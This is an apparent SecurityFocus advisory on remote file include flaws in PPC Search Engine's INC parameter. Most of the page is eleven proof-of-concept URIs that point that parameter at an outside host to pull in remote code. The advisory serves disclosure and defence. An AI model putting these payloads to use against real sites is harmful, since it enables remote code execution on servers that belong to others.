Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PPC Search Engine INC Parameter Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/path/config/config_admin.php?INC=http://www.example2.com?
http://www.example.com/path/config/config_main.php?INC=http://www.example2.com?
http://www.example.com/path/config/config_member.php?INC=http://www.example2.com?
http://www.example.com/path/config/mysql_config.php?INC=http://www.example2.com?
http://www.example.com/path/admini/admin.php?INC=http://www.example2.com?
http://www.example.com/path/admini/index.php?INC=http://www.example2.com?
http://www.example.com/path/paypalipn/ipnprocess.php?INC=http://www.example2.com?
http://www.example.com/path/members/index.php?INC=http://www.example2.com?
http://www.example.com/path/members/registration.php?INC=http://www.example2.com?
http://www.example.com/path/main/ppcbannerclick.php?INC=http://www.example2.com?
http://www.example.com/path/main/ppcclick.php?INC=http://www.example2.com?







 

Privacy Statement
Copyright 2009, SecurityFocus